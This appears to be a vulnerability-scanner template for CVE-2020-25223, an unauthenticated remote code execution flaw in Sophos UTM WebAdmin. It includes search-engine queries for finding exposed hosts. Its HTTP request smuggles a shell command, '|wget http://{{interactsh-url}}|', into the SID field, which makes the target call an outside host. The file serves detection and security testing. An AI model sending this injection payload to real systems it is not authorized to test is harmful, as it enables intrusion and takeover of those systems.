id: CVE-2020-25223
info:
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
remediation: |
Apply the latest security patches provided by Sophos to mitigate the vulnerability.
reference:
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
- https://nvd.nist.gov/vuln/detail/CVE-2020-25223
- https://community.sophos.com/b/security-blog
- https://cwe.mitre.org/data/definitions/78.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-25223
cwe-id: CWE-78
epss-score: 0.97521
epss-percentile: 0.99989
cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sophos
product: unified_threat_management
shodan-query: http.title:"securepoint utm"
fofa-query: title="securepoint utm"
google-query: intitle:"securepoint utm"
tags: cve,cve2020,sophos,rce,oast,unauth,kev
http:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a0047304502205dc1664f5c457024a05322ea4f90f1b555fa287fa88d891fdd22ab9f01254c6f022100a2775475c594fb68dc732630b5d0861715e7d2b5e50722a65a2206ffcd920929:922c64590222798bb761d5b6d8e72950